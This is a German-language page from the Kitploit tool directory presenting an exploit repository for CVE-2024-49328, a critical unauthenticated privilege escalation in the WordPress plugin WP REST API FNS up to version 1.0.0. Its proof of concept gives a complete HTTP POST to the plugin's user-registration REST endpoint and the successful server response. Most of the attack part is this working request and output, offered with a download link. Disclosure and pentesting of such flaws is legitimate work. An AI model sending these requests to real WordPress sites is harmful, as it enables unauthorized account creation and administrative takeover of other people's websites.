Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-49328 — WP REST API FNS <= 1.0.0 - Privilege Escalation | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-49328
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubrandomrobbiebf/cve-2024-49328

CVE-2024-49328

WP REST API FNS <= 1.0.0 - Privilege Escalation

Repository anzeigen
614vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-49328

WP REST API FNS <= 1.0.0 - Privilegieneskalation

Beschreibung:

Das WP REST API FNS Plugin für WordPress ist in allen Versionen bis einschließlich 1.0.0 anfällig für eine Privilegieneskalation. Dies ermöglicht es nicht authentifizierten Angreifern, Administratorenrechte zu erlangen.

root@kitploit:~
CVE: CVE-2024-49328
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: rest-api-fns

Konzeptnachweis

Anfrage

root@kitploit:~
POST /wp-json/api/v2/user/register HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/json
Content-Length: 57

{"email": "[email protected]", "password": "yourpassword"}

Antwort

root@kitploit:~
HTTP/1.1 200 OK
Date: Wed, 06 Nov 2024 16:25:12 GMT
Server: Apache/2.4.57 (Debian)
X-Powered-By: PHP/8.2.13
X-Robots-Tag: noindex
Link: <http://kubernetes.docker.internal/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Allow: POST
Content-Length: 191
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=UTF-8

{"status":200,"message":"User Register Successfully","data":{"user_id":"7","user_email":"[email protected]","user_nicename":"userexample-com","user_fname":"","user_lname":"","profile_url":""}}
Tool herunterladen